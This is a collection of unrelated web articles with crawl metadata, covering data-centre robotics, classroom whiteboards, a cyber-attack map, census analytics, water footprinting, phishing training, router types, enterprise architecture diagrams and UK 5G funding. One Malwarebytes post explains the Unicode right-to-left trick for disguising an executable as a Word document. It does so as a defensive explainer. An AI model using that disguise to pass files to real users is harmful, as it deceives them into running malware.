To date, security concerns have been addressed via the deployment of purpose-built appliances for detecting, monitoring and quarantining of common known attacks from external sources, as well as firewalls for both solidified perimeters and internal segmentation. In addition, internal threats have been tackled via various software-based policies, password or authentication technologies, siloed departments and access control, and other advances like auto-redaction. But, the question is whether this is all that can be done or are there areas that can be advanced not currently in use?
One area current security approaches don’t address is the infrastructure itself. Network infrastructure in the data center is currently static, meaning IT must take a very hands-on approach to making and maintaining connections so the business can move forward. This not only can lead to more money and time being spent to manage growing data centers, but also introduces potential security threats and impacts businesses ability to respond in the event of either malicious or unintentional breaches.
With data centers now sprawling to millions of square feet and the effort for securing them continues to grow IT managers must consider ways to make infrastructure more dynamic so it will be easier to respond and control points of vulnerability. Robotics presents a very compelling case and can be leveraged to significantly improve data center security response.
Security concern: The risk of human error – whether malicious or not
Let’s face it, humans makes errors. Whether they are simple mistakes or malicious attacks, these errors can pose a profound risk to a business and its data. The security threats posed by traditional viruses, Trojan Horses and other common methods are well-known and documented and currently protected against by advanced firewalls and other appliances.
However, many forget to consider and address another point of vulnerability – the infrastructure itself. At present, all optical connections within a data center are cared for manually. Miscommunication or other human error when performing simple maintenance or making adjustments to network infrastructure can increase the potential for a wrong move to be made and security threats quickly becoming a bigger problem. Finding a way to automate these connections and removing the potential for human error can simplify monitoring of potential areas of exposure and help save money in the process.
Security concern: Quickly stopping a security threat in its tracks
The longer it takes to react to a security threat can be the difference between an easy-fix and a big headache. When a security breach happens, certain things need to be done very fast to cut off the bridge and to reroute the traffic so as to avoid from the threat from spreading. Today, physical connections in remote data centers must be changed manually, meaning a company is only as quick to respond as it can dispatch an operator and get to work.
It takes people time to travel, to get on the phones and to get to the data center to fix the issue. This valuable lost time gives security vulnerabilities longer to propagate, potentially exposing additional machines and servers. Taking a more proactive approach to your infrastructure and enabling it for dynamic, remote management can significantly improve your business’ time-to-response and enable IT to quickly mitigate any risk.
Solution: Robotic automation
These security concerns become nonexistent with the incorporation of robotics into the data center. Putting traditionally manual tasks in the “hands” of robots makes data center networks more secure, and security issues can be resolved in real time, remotely, with no worry of human error or lag time. Robotic technologies make the network infrastructure dynamic, and can assist IT staff in quarantining threats by eliminating connections to other systems remotely in a fast manner.
Additionally, robotic automation also makes network infrastructure simplified. Currently, connectivity is run in the data center with many different layers of technology and protocols, making the network complex which leaves it open to vulnerability. Introducing robotic physical optical connectivity, to be able to setup a physical connection through software with application control, often called SDN, simplifies this. The software of the application can try the connectivity when they need it as they need it.
A robotic technology that can connect or disconnect a network connection physically and quickly introduces more security and manageability, in terms of setting up and building a more robust and simple network, resulting in a higher level of security. As a result of the introduction of robotic technology for managing the physical optical connections within the network operators will not only see improved security response, but also reduced OPEX and CAPEX, and improved reliability, as well as future-proof their critical infrastructure.
David Wang is CEO of Wave2Wave, a data center connectivity company headquartered in California. | <urn:uuid:ff53249f-f8a4-4c0a-8c37-c8cbffc3a0d9> | CC-MAIN-2022-40 | https://www.datacenterdynamics.com/en/opinions/are-robots-the-cure-for-it-security-ills/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335304.71/warc/CC-MAIN-20220929034214-20220929064214-00155.warc.gz | en | 0.945446 | 986 | 2.5625 | 3 |
If you went to school in the 90s, 80s, or before then, you’ll remember the chalkboards that once filled the hallways of our schools. You’ll also remember making the “nails on a chalkboard” sound when a piece of chalk was used the wrong way. Then there were the overhead projectors. Who didn’t love the thrill of being allowed to write on the transparency with a dry-erase marker and seeing the results projected on the wall?
Good thing for us, classroom lessons have evolved quite a bit since then thanks to game-changing technology. Students born into the digital age are now learning more efficiently by adapting to a technologically forward learning experience. Interactive whiteboards invite students to actively engage with lessons and teachers aren’t limited in what they can present and how they collaborate with their students.
How can an interactive whiteboard enhance my classroom?
SOURCE Sharp AV | <urn:uuid:d14c1944-00d8-4415-babf-3a5343459e5c> | CC-MAIN-2022-40 | https://www.industryanalysts.com/081722_sharpav/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336921.76/warc/CC-MAIN-20221001195125-20221001225125-00155.warc.gz | en | 0.963534 | 192 | 2.515625 | 3 |
We've all heard that the scale and number of cyber attacks are constantly increasing, and that the bad guys are only getting smarter – but can you actually picture what the unfolding exchange of cyber attacks looks like around the world?
Well now you can, with security company Norse's real-time online map of global cyber attacks (opens in new tab). The map uses honeypot servers around the world to entice attackers into launching their attacks, and then displays them in real time on the map. The result is pretty mesmerising, and shows the true scale of the worldwide cyber war going on all around us.
Most attacks originate in the US or China, usually targeted at each other, but other attacks originate from Russia, Southeast Asian countries like Malaysia, and all across Europe – even the UK.
You can also see which type of hack is being used. The result is rather varied: Microsoft-DS (port 445) is still one of the top targets (it's the port used for Windows file sharing), but DNS (port 53), SSH (22), and HTTP (80) are all very popular too.
You'll probably see a lot of CrazzyNet and Black Ice, too — two common Windows backdoor programs often used by script kiddies and criminals, rather than actual cyber warriors or nation states.
Every now and then, you'll also catch sight of a huge co-ordinated attack originating in China and coming down on the US like the fiery fist of an avenging God. While there's no direct evidence linking these back to the Chinese government, they do seem to happen all at once from a lot of different locations around the country – suggesting that someone is co-ordinating them – whether a cyber criminal mastermind or the Chinese government itself.
Back in 2012, the US Department of Defense reported that it was the target of 10 million cyber attacks every day; likewise, the National Nuclear Security Administration (which is in charge of the US's nuclear stockpile), says it saw 10 million attacks per day in 2012. We can only assume that these numbers have increased over the intervening years.
While the targets aren't real, the attackers on the map are, and we can suppose that the actual number of attacks going on is much higher than even the Norse map suggests. Still, this will give you some sense of just what's going on out there, and why a strong cyber security policy is a must-have in today's business world. | <urn:uuid:1c17fdfe-8741-4d5a-a77e-30085ab48c25> | CC-MAIN-2022-40 | https://www.itproportal.com/2014/07/03/how-to-watch-global-cyber-war-unfold-before-your-eyes/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337398.52/warc/CC-MAIN-20221003035124-20221003065124-00155.warc.gz | en | 0.955695 | 497 | 2.8125 | 3 |
The Soviet Union’s launch of Sputnik in 1957 ushered in an era of space exploration that saw both the USSR and the United States double down on their efforts to explore what Gene Roddenberry’s character, Captain Kirk, describes as “the Final Frontier”. President John F. Kennedy accelerated the national focus on space in the 1960’s, calling for the United States to put a person on the moon by the end of the decade.
From that first moonshot to NASA’s successful landing of the Perseverance on Mars in 2021, space has remained a priority for the United States. What has changed is the new technological capabilities other countries and private organizations have acquired for launching spacecraft and satellites into orbit for scientific exploration, communications, intelligence gathering, and even recreational space travel. But what do these advancements mean for us here on Earth?
A New Approach to Data Analytics
According to a recent article in Space News, we are in the midst of another space race. Organizations like the National Geospatial Intelligence Agency (NGA) maintain a lead in the “geoint” race. But with China investing in advanced Low Earth Orbit (LEOs) satellites that can revisit any point on the globe within 30 minutes, agencies like NGA “need new approaches for handling big data and for delivering information to customers faster.”
As the article points out, the key to managing this ever-growing data flow is automation and achieving maximum interoperability between systems. Efficiently managing the extreme influx of data is just the starting point for intelligence organizations like NGA as agencies undertake digital transformation efforts. Agencies are evolving from viewing data analyzed by human analysts, to applying advanced analytics that improve situational awareness and accurately predict events. Big data challenges — similarly facing DOD, I.C.-related, and civilian agencies — require solutions that deliver data agility, unified analytics, and the ability to easily deploy predictive analytics in near real-time.
Near real-time delivery of information is not possible without high-speed analytics and high-volume throughputs across systems. Deploying a higher level of Analytic Process Automation (APA) with predictive modeling capabilities democratizes the ability to harness and leverage vast data from numerous sources, including geospatial and satellite imagery.
Recently, Alteryx partner, Reveal Global Consulting, shared a use case where the U.S. Census Bureau is turning to the use of analytic automation and satellite imagery to speed up the creation of insights that feed key economic indicators.
Economic insights require quality data
“As we advance into the 21st Century, we are experiencing increased demand for our data, struggling with challenges to traditional data collection methods, and exploring rich new data sources and tools that can revolutionize what we do and how we do it. Our success critically depends on our ability to seize the opportunities in front of us to deliver statistical products that address increasingly complex and diverse needs of our users.”
—Ron Jarmin, Deputy Director, U.S. Census Bureau
Most Americans are familiar with the U.S. Census Bureau given its role in surveying every person for the "Decennial Census of Population and Housing." People may not know that the Census Bureau, part of the U.S. Department of Commerce, is the nation’s leading provider of quality data about the economy.
Mandated by law, Census collects, analyzes, and reports actionable data about people, places, and the health of the economy to Congress; the White House Office of Management and Budget; federal, state, and local government agencies; news organizations; businesses; and the public. For example, Census data, research findings, and key indicators are used to:
- Assess the health of the U.S. economy
- Allocate funding for new roads and schools
- Define voting districts
- Provide services for the elderly
- Locate job training centers
- Qualify people for social security
- Assess construction spending and activity
- Audit disaster recovery spending
Data as a Strategic, High-Value Asset
Census data is one of our most valuable national assets. It must be accurate, timely, protected, and used wisely to effectively allocate over $675 billion in federal funding to states, local communities, and businesses.
For the past several decades, Census has relied heavily on burdensome manual processes and outdated tools to collect, process, analyze, and report data on the population, housing, businesses, workforce, public finance, resources used, etc. The sheer volume, velocity, and veracity of Census’ big data is hard to manage with legacy systems. Manual surveying and data processing are labor-intensive, tedious, and costly.
Analytic Automation Enables Insights on Construction Indicators
As part of its digital transformation efforts, U.S. Census Bureau Economic Indicators Division, Construction Programs, contracted Reveal Global Consulting to design, build, and deploy modernized and automated approaches for data collection, analysis, and dissemination that reduce operational costs while improving the accuracy and quality of Census economic indicators. Specifically, Census wanted an advanced analytics and process automation solution to compile and release U.S. economic indicator data worldwide that would meet specific requirements and achieve tangible goals:
- Eliminate redundant data entry
- Streamline the indicator release process
- Create a consistent look and feel for the indicators’ website
- Prevent early release of indicators
- Maintain security of indicator information
- Re-use existing systems rather than create new ones
- Use enterprise systems for their primary purposes
- Use a loosely coupled architecture
- Use existing security infrastructure
- Minimize changes to established business processes
- Refactor code rather than rewrite it
- Improve the quality of Census data products
- Prioritize security over performance
A Unified Approach to Analytics
The U.S. Construction Indicator use case required an end-to-end solution with a robust Analytic Process Automation (APA) platform at its core. APA eliminates data analysis barriers by unifying multiple tools into one platform that provides end-to-end, self-service analytics across big data management prep, analytics and data science, and process automation to accelerate insights and actions.
Working directly with the client, Reveal built an advanced analytics and visualization solution for Census that enables the following:
- Modernizes construction industry indicators (housing starts, residential and non-residential construction spending, and others)
- Identifies alternative sources of data to reduce reliance on surveys
- Leverages advanced analytics and automates processes to optimize performance
- Provides advanced analytics and data visualization to provide Census users and external stakeholders with timely, relevant insights for optimal decision-making
- Uses A.I. to analyze satellite image data showing construction activity over time
The solution collects, filters, formats, and aggregates unstructured data from numerous Census and third-party sources. The data is ingested into the Alteryx APA Platform which, in turn, enables the creation and scheduling of workflows that can collect satellite imagery and automate analysis using geospatial and AI/ML capabilities to validate, compile, and create more accurate and timely construction indicator insight. Data utilized includes:
- Third-party U.S. permit data for residential single-family homes
- Web-scraped jurisdiction websites and PDFs
- Census shapefiles for every U.S. state
- Satellite images of construction sites show pre-construction and post-construction
Once trained, the analytic solution automates critical functions, including the ability to:
- Filter, format, and aggregate data from multiple sources
- Map and perform geospatial analysis
- Evaluate third-party data coverage and evaluate for accuracy
- Schedule, prompt, and collect CNN Model Classifications
- Evaluate and aggregate image classifications
- Merge third-party construction data and image classifications
- Create visualizations
- Automate the updating of Construction Indicator insights
Analytics Automation: Accelerating the Quality of Insights
With analytics automation, agencies like the U.S. Census can create, acquire, leverage new data sources, and provide higher quality service offerings and products to end-users. By reducing the need for manual field data collection, aggregation, and other preprocessing efforts, the analytics automation capability enabled by Alteryx and Reveal is accelerating the quality and accuracy of insights on construction activity and is improving organizational flexibility and operational efficiency by allowing the Census resources to focus on high-value tasks.
Watch This Next.
Want to learn more about how Reveal Global Consulting and Alteryx partner to deliver a unified automated analytics capability that reduces manual processes around prepping, blending, and analyzing data, including the automatic creation of geospatial insights from satellite imagery?
Watch our brief video conversation with Reveal.
Read This Next
分析の成熟度の 5 段階
分析の成熟度の 5 つのステージと、自社の現状を把握する方法をご紹介します。
SoFi Bank 社が収支予測を合理化
収支予測の効率化にお悩みではありませんか?SoFi Bank 社の成功事例をご覧ください。 | <urn:uuid:26ccd878-d0e4-417a-a1b3-f181441cbeb2> | CC-MAIN-2022-40 | https://www.alteryx.com/ja/input/blog/analytics-and-the-final-frontier | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337504.21/warc/CC-MAIN-20221004121345-20221004151345-00155.warc.gz | en | 0.885415 | 2,039 | 2.515625 | 3 |
As organizations embrace the ESG imperative, water footprinting is a term that’s creeping into the corporate consciousness. Positive environmental action demands that your approach embraces all aspects of sustainability, exploring areas that may have historically been lower-profile than, say, carbon footprints and greenhouse gas emissions.
Water footprinting is one of these areas.
What Is Water Footprinting?
As with a carbon footprint, every individual and business will have a water footprint. Everything we consume, manufacture, use, buy or sell will use water in the process. Water usage can vary enormously between sectors. When looking at which industry has the highest water footprint, the paint and coating manufacturing industry was the most water-intensive industrial sector in the US in 2020, using 123 gallons per dollar output. Famously, it takes nearly 2000 gallons of water to make one pair of jeans.
The water footprint, or water footprinting, is the process of measuring the amount of water used to produce the goods and services we use. You can measure your business’s water footprint for a specific process or product. You can also measure your entire organization’s water footprint — even an entire country’s or continent’s.
Why Does Your Water Footprint Matter?
Businesses worldwide are accepting their responsibilities around sustainability and environmental impact. ESG is fast becoming “the way we do things” rather than an overlay or afterthought; it’s expected that reputable businesses take steps to minimize their corporate footprint — and your water footprint is an intrinsic element of that.
Activities and processes vary hugely in the amount of water they use. The process to produce one kilogram of beef requires approximately 15,000 liters of water, for example, while a 150-gram soy burger produced in the Netherlands takes about 160 liters.
And your accountability on water footprinting doesn’t end with your own operations. Understanding the water footprint of your supply chain is also vital — sometimes referred to as “direct” and “indirect” water use. A large percentage of your water footprint might exist beyond your corporate — or even country — borders. About 10% of the Chinese water footprint, for instance, falls outside China.
With shareholders becoming more activist over ESG issues, your ESG policy must be as comprehensive as it can be. This means that calculating your water footprint is an essential element of a fully-rounded approach to ESG.
Calculating your business water footprint enables you to identify where your operations or supply chain are dependent on water and to what extent.
The Green, Blue and Grey Water Footprints
There are three water footprints: green, blue and grey. What makes a blue, green or grey water footprint?
- The green water footprint is water from precipitation. It is stored in the root zone of the soil and is evaporated, transpired or incorporated by plants. It is most relevant to the horticultural, agricultural and forestry industries.
- The blue water footprint is surface water or groundwater water that is consumed by — in other words, evaporated or incorporated into a crop — during the cultivation process.
- The grey water footprint is the fresh water needed to bring water that has been polluted up to safe water quality standards.
Measuring these footprints will give an organization a comprehensive picture of its overall water footprint.
How To Calculate Your Water Footprint?
In recent years, organizations have become accustomed to measuring their carbon footprints to comply with global carbon emissions legislation.
Carbon footprints, though, can be easier to calculate than water footprints. Because water is a resource rather than an emission, issues such as supply and scarcity must be taken into account to put water footprint into context.
Steps in Calculating a Water Footprint
Step 1: Calculate how much water is used to produce a product or service in your supply chain
Step 2: Carry out an impact assessment. What does it mean to use this amount of water? In the context of local supply and demand, what impact does it have? Using a liter of water in an area where clean water is at a premium will have more impact than doing the same in an area where it is freely available. This second step can be contentious. Whereas there is a set methodology for calculating carbon emissions, the ways that water impact is measured can be more subjective.
Different Methods for Calculating Water Footprint
When calculating your water footprint, it’s important to carry out a life-cycle assessment (LCA) — a systematic and phased approach to the use of water throughout the life-cycle of the processes, products or services you provide.
Within this, there are two accepted methods for calculating a water footprint: midpoint methods and endpoint methods. Midpoint methods measure impact, while endpoint methods go a step further and include an indicator that measures the damage done via an individual or organization’s actions.
Different midpoint methods for measuring water footprints use different scarcity equations — the calculation used to define how rare a commodity water is. The two main scarcity equations used are:
- Withdrawal to availability (WTA) ratio: How much water is withdrawn locally via industrial processes compared to how much is available
- Consumption to availability (CTA) ratio: As above, but includes only water that is totally removed from the water source as a result of the process (as opposed to water temporarily removed and then returned)
The Endpoint Method
Similarly, different endpoint methods for calculating water footprints use different scarcity equations when evaluating how much damage has been done. Some methods focus only on the impact on human health, while others also consider the impact on ecosystems and other resources.
International Standard on Water Footprinting
In 2014, the ISO published ISO 14046: Water footprint: Principles, requirements, and Guidelines. The international standard sets out principles and requirements for calculating a water footprint and is a helpful reference for any organization starting its water footprinting journey.
Water Footprinting Made Simple
Water footprints are growing more critical as organizations widen the scope of their ESG strategies. Robust data and reporting are as crucial for water footprints as carbon ones.
With water consumption, not just an ESG indicator, but a substantial cost for many businesses, there are significant benefits to calculating and taking steps to reduce your water footprint.
To do this successfully, you need accurate and clear dashboards that show water consumption in a granular and comprehensive way.
Trend analysis can help you determine how your water footprint is evolving and, if needed, build a business case for investment in water use reduction strategies and technologies. Top-level aggregation — to engage senior leadership with “big picture” water footprint data — combined with the ability to drill down into the detail, is vital. With water footprinting potentially more complex than other ESG measures, it’s essential that your users have an intuitive experience.
The best water footprinting solutions deliver alerts if there are gaps in your data sources, prompting action where needed, with audit-standard reporting instantly available.
Take the next step to conquer water footprinting as part of your strategy to set, monitor and achieve your ESG goals. Find out more about the ways Diligent’s Modern ESG approach can help. | <urn:uuid:e0296c98-7cce-4cff-9aaf-a05c1426e297> | CC-MAIN-2022-40 | https://www.diligent.com/insights/esg/water-footprinting/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337504.21/warc/CC-MAIN-20221004121345-20221004151345-00155.warc.gz | en | 0.928959 | 1,488 | 2.828125 | 3 |
To make training stick, immerse employees
When aspiring pilots go through flight school, they learn both in a conventional ground setting and using a flight simulator. On the simulator, new pilots are immersed in the experience of flying, and receive real-time feedback about their decision making. Not surprisingly, the simulator is seen as a more effective training tool than conventional classroom training.
One of the greatest challenges facing security awareness initiatives is providing employees with an experience they will actually remember and retain. Training users to avoid risky security behavior is not nearly as complicated as teaching someone to fly a plane, but just like with pilots, immersive training that simulates the kind of attack methods employees face is a more effective way to conduct security awareness.
Immersing a human in an experience triggers the brain in a way that traditional training doesn’t – by drawing an emotional response. In complex vertebrates (contrary to what some in security might say, your users do fit into this category), the amygdala is the area of the brain associated with both memories and emotions. This is why hearing that old Van Halen song brings back memories of high school (at least for some of us!). An emotional experience sticks in our memory, making training techniques that elicit emotions more powerful. This is why posters and conventional computer based training fall short.
We observe the fleeting nature of email communication within our own customer base. Some of our customers choose to follow a PhishMe best practice and announce PhishMe campaigns before sending them out, while others do not inform their employees. While it would stand to reason that the employees who had been informed would be less likely to fall for the phish, there is no measurable difference in the end result of the campaigns. Simply sending a person an email informing them that a training exercise is going to be sent through email is not enough to change their behavior. You need to draw an emotional response as well. Those customers that do inform their employees, however, are able to fend off negative backlash as well as eliminate the perception that they are trying to pull one over on the users.
Equally important is providing feedback to participants, as simply simulating an attack won’t provide the meaningful information that triggers the emotional response. If users fall for a simulated phishing attack, but don’t know what they have done, it’s a missed opportunity to change their behavior. A great example of how feedback spurs behavioral change can be seen in the example of radar speeds signs. These are the signs usually placed near a construction site or school and display the speed we are driving just underneath the posted speed limit. These signs are effective at changing behavior positively because they provide us with instant feedback about our behavior, as well as a guideline for improving it. This technique leverages a concept called a feedback loop, discussed in greater detail in an article from Wired magazine.
Repeating immersive training exercises capitalizes on a neurological process called long-term potentiation, which is how the human brain forms memories and retains them. Memories form from similar synapses between neurons, and repetition of those synaptic processes cause us to learn and retain information. Conducting annual training will not lead to retention – even if the training itself is compelling – because it won’t be frequent enough to stick in employees’ minds. Whenever we are learning something new, whether it’s to play a sport, instrument, speak a new language, etc. repetition is crucial. By repeating his golf swing on the driving range thousands of times, Tiger Woods made that action become second nature. It’s the same with teaching email users safe email behavior, repeatedly conducting security awareness exercises will allow them to make safe email use a habit.
We’ve observed this first-hand with customers who purchase a PhishMe license and then only run one or two campaigns. They don’t see the improvement that customers who run consistent campaigns experience. Moreover, we’ve seen customers use PhishMe successfully to improve organizational resilience to phishing attacks, only to regress upon discontinuing PhishMe. Sporadically conducting training or discontinuing training altogether misses the opportunity to train new employees as well as update training to address emerging attack vectors.
Ultimately, immersing your employees in an experience will improve their behavior. Our experience training over 4 million unique users has shown that around 58% will fall for phishing emails prior to training, but after a few months of immersive training that number can be reduced to less than 10%.
–Rohyt Belani and Scott Greaux | <urn:uuid:f721bba6-0888-4a8d-8795-e60af2789ed9> | CC-MAIN-2022-40 | https://cofense.com/to-make-training-stick-immerse-employees/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337668.62/warc/CC-MAIN-20221005203530-20221005233530-00155.warc.gz | en | 0.954579 | 927 | 2.65625 | 3 |
Different Types of Routers in Networking
Routers, acting as the police of network traffic, are responsible for directing different types of networks to maintain the best transmission routes on their own roads. If the network is the core of global communication, then the router should be the heart of the network. Different types of routers emerged in an endless stream to meet the needs of users of different scales. There are five main types of routers in the market according to the application category. They are wired routers, wireless routers, core routers, edge routers and VPN routers. Basic information for the above is provided for you when choosing a right one among the various routers.
Wired Router VS Wireless Router
Wired routers are older versions of routers with cable connections at both ends to receive and distribute data packets. Wireless routers, which transmit data directly to computers and other electronic devices via radio signals, are more advanced.
A wired router connects directly to a computer via a cable. One port is used to connect a modem to receive Internet packets, while the other port connects to the computer to distribute processed Internet packets. Ethernet broadband router is one of the most classic wired routers. These routers support network address translation (NAT) technology, which allows multiple computers to connect in wired routers to share a single IP address. Wired routers use (SPI) firewalls while providing communication between computers within the network for security purposes. However, the wired router has a limited number of device connections, and they are extremely inconvenient to connect, so they are gradually replaced by wireless routers.
A wireless router is defined as opposed to a wired router. It can be found in offices, homes or other public places. Like wired routers, wireless routers receive data packets over wired broadband, convert the packets written in binary code into radio signals that are picked up by electronic devices, and then convert them back into previous packets. Unlike wired routers, wireless signals are the medium through which packets are sent to electronic devices. So as long as your device is within the range of the signal, you just need to enter a specific ID and password to access the Internet. Wireless router security is achieved through wireless media access control (MAC) address filtering and Wi-Fi protected access (WPA). The most widely used wireless router is the WiFi network which we are familiar with. With passwords, and assuming your router is strong enough, there is no limit to the number of users who can connect to the network. Easy connections and heavy loads are the main reasons wireless routers are popular in the market.
Attention: LAN: A wired local area network established by a wired router.
WLAN: A wireless local area network established by a wireless router.
Edge Router VS Core Router
Edge routers are located at the boundaries of a network and distribute packets across multiple networks, keeping communication flowing between several networks. Whereas, the core router operates on the same network and transfers large amounts of data at top speed.
As the name suggests, an edge router is located at the edge or boundary of a network, usually connected to the network of an Internet service provider (ISP) or other organization, and it distributes packets across multiple networks, but not within the same network. They can be wired or wireless routers, and their job is to keep your network in smooth communication with other networks. Besides, the edge router can connect to the core router.
In contrast to edge routers, core routers distribute packets within the same network rather than across multiple networks. It runs on the backbone of the Internet and its job is to carry out heavy data transfers. The core router supports the routing protocols used in the kernel. It is able to reach a variety of communication interface transmission of the highest speed, allowing all IP packets to move at full speed. In some cases, core routers can also connect distributed routers from multiple large enterprises or community locations, thus high- performance is a basic requirement for core routers.
Generally speaking, a VPN router can be seen as a normal Gigabit router that has VPN client software installed on it. Every device that connects to the VPN router is protected by VPN at any time. Whether it is your home, office or company, VPN routers can bring numerous benefits of VPN connections to all devices. We have listed the functions of VPN router as follows:
Providing unlimited connectivity.
When connecting to a VPN server via a router, you can use any number of devices. In addition, you can share encrypted connections with friends and visitors without worrying about sharing accounts (which is generally prohibited under the terms of service of VPN services).
Providing better platform adaptability.
Popular online media like Apple TV, Amazon Fire TV or Chromecast currently don't support VPN protection. However, you can still add them to the list of protected devices by connecting them to your VPN router.
Unblocking application and content.
Are you currently in a country that blocks certain applications or contents? A VPN router enables you to bypass the restrictions and connect to the Internet via an encrypted VPN tunnel through another country entirely.
Logging in once.
Many people often forget to log in to their VPN or set up their clients to run automatically at startup. Once you set up your VPN router, you don't have to worry about this - you just log in once, and that's it for good! If you use a VPN frequently on multiple devices, this is a practical and effective solution.
Today, with the rapid development of the Internet, various network accidents appear frequently. Network security has also become the primary concern of individuals, families and enterprises. And the emergence of VPN routers has brought good news to them. Its powerful network protection channel has stopped numerous information leakage incidents. In the future, VPN router will be the darling of the market, it will become the first choice for users to buy a router.
As a mainstream product in the network communication market, we all want to gain knowledge about routers as much as possible. And we hope to provide you with a more comfortable experience when choosing the correct router through this analysis of the basic information and characteristics of router types. | <urn:uuid:90d18943-631a-4e8d-b128-3ad36b96ea1a> | CC-MAIN-2022-40 | https://community.fs.com/blog/different-types-of-routers-in-networking.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337668.62/warc/CC-MAIN-20221005203530-20221005233530-00155.warc.gz | en | 0.944467 | 1,240 | 3.4375 | 3 |
Malware authors are known to try various obfuscation techniques in order to hide their malware. The Unicode Right-to-Left trick (RLO), which has been known for quite some time, has been reported again by security firm F-Secure, showing its resurgence.
In their report, a signed Apple program was disguised to hide its true nature and install a piece of malware.
This prompted me to examine this technique in greater detail. This is a neat trick that deserves a proper explanation.
To understand how this works you need to know what Unicode is: an international encoding standard for use with different languages and scripts.
This allows computers, in our case, to display characters in special ways. The feature abused here is the “Right-to-Left” function. This would most commonly be used when displaying a language that is read in such a fashion, such as say Arabic, or Hebrew, to name a few.
This means that a cleverly named executable, manipulated in such a way, could be made to appear as something other than what it really is.
Windows XP requires specific configuration changes to enable support for this feature. We can use it to demonstrate what the file looks like, if an operating system does not know how to display RLO properly. This is useful to visualize where the flip point is inserted. Here is Windows XP, displaying my test file:
The white box in the filename is the RLO unrecognized, thus not reading from right to left. This makes it easy to spot our file as an executable. Once the flip occurs the “cod” will appear as ".doc" completing the illusion.
Native support for this feature has been present since Windows Vista. Here is the same file, on a Windows 7 system:
I chose a filename that completed the illusion but didn't look suspicious. You could also have multiple RLO insertions to accommodate a different name that would not need to end in "exe." I also took it a step further, by modifying the embedded icon of the executable, to make it appear as a word document. Another common file extension used with this technique is ".scr," which is used for screen savers.
Although this particular example was crafted for the PC, on a PC, I decided to copy it over to other machines in our lab, to see how it would be displayed. Here is the same file, on a Linux machine:
Since Linux cannot execute windows PE files, the threat is greatly reduced, but the file name is still being shown with the ".doc" file extension. Examining the same file from a command line environment reveals it's true nature:
And again, on a mac:
As it was originally crafted for a PC, this doesn't work very well. The OSX command line also displays the file correctly:
However the autocomplete feature built into the command line of OSX briefly shows the file the other way:
A common vector for such files would be via e-mail, and unless the file was compressed in a zip, executables are disallowed. I tried sending the file via Gmail, and received an interesting error:
This message is Gmail, informing me that executables aren't allowed.
And there you have it! Right-to-left functionality abused to try and cloak the file extension of an executable. This is by no means a new vulnerability, but still an interesting vector. | <urn:uuid:e555317e-0537-49a3-a533-1576e1b9cb48> | CC-MAIN-2022-40 | https://www.malwarebytes.com/blog/news/2013/07/bi-directional-trickery | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337668.62/warc/CC-MAIN-20221005203530-20221005233530-00155.warc.gz | en | 0.964666 | 699 | 3.203125 | 3 |
Trap #16 Just the Architecture Diagram
Architecture Diagrams are a communication technique not an architecture development tool.
Enterprise architects at the top of their game develop architecture. An enterprise architecture is useful while it is being developed, and after the stakeholder approves it.
We use architecture diagrams. They are only part of the delivery of useful architecture. Often a small part.
Crash and burn stories
Low-functioning EA Teams. One anti-pattern after another.
If you see these practices, stop! Stop now!
Eject while you still can.
Be a better architect
Free 90-day Personal Enterprise Architect Kickstart to be a better architect.
Weekly recorded webinar, with downloads
We have all seen a practitioner show up with a carefully drafted architecture diagram that showed how some elements of a system should relate in the future. We reverently look at the picture, appreciate the elegance. Then we go about creating a system that bares only superficial relations to the diagram.
Why? Everything that comprises a useful architecture was missing:
- gaps that indicate what change is needed
- controls that mitigate risks to the enterprise
- specifications that constrain designers, implementers, operators and future architects
- anything that highlights how the future ecosystem will deliver better value than what we have today
These carefully crafted diagrams typically represent a part of the complete ecosystem. Too often the diagram is a filled with arbitrary design choices made to support the practitioner’s biases.
Good architecture supports informed decision during the architecture development process and constrains design, implementation and operational choice. A diagram might do these things.
You can't govern from a box & line
Usually picture-based delivery short circuits the rich understanding in the minds of Stakeholders, decision makers and key contributors that evolve during development. This damage occurs because few diagrams can represent more than a single Concern. When we focus on these diagrams, we implicitly avoid complex trade-off and become fixated on a single optimization.
Diagrams masquerading as architecture are replete with unjustified specification and control. Unjustified because the rule only ‘stands alone.’ Standing free of context, the diagram specifies a service provider, software, or an operational location. Good architects see this and have to hold back the cry of why?
Best practice links a specification explicitly to a goal, objective, or other requirement and the design choice to the specification. Without this linkage, how can we assess the fitness of the design choice to the objective?
We’ve all heard the excuse, ‘but the diagram is just a View.’ In our EA Capability practice, our eyes are rolling. If it is an architecture view where is the repository that maintains the information that highlight concerns, requirements, preferences, relationships, and analysis. You guessed in the practitioner’s head where peer review and reuse are impossible.
Conexiam Navigate uses the Solution Development Notebook, or SDN, to address actively support the change & implementation teams and facilitate portfolio managers control change initiatives and measure value. In every SDN the architect needs to identify the essential guidance for the implementer, the owner, and the portfolio manager.
Join the Enterprise Architecture Kickstart
Free 12-week program to be a better enterprise architect | <urn:uuid:9dd9682a-3665-4975-9a2a-4cbd5dac01f7> | CC-MAIN-2022-40 | https://conexiam.com/enterprise-architecture-trap-16-just-the-architecture-diagram/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337971.74/warc/CC-MAIN-20221007045521-20221007075521-00155.warc.gz | en | 0.906454 | 681 | 2.609375 | 3 |
The UK government is awarding £16 million to three universities to develop a cutting-edge 5G test network.
With all five chosen for their international reputation in the field of 5G, King’s College London, the University of Surrey, and the University of Bristol will be responsible for building the network, which will be used by academics and commercial partners to trial and demonstrate the benefits of the next generation of mobile technology.
5G is expected to deliver reliable ultra-fast mobile connectivity, with the ability to process huge amounts of data and support complex applications for tomorrow’s mobile phones – for example, sending virtual reality (VR) 3D TV clips to mobile devices.
The technology should also be significant in supporting the growing number of connected devices and IoT applications that are emerging, in areas such as autonomous vehicles, robotic deliveries and other smart city developments.
Market research firm, IHS Markit, has predicted that 5G will enable $12.3 trillion of global economic output by 2035. This is one assessment among many that are fueling the growing buzz around the potential for 5G. Given the weight of these expectations, the government estimates that a world-class 5G test network could add up to £173 billion to the UK economy by 2030.
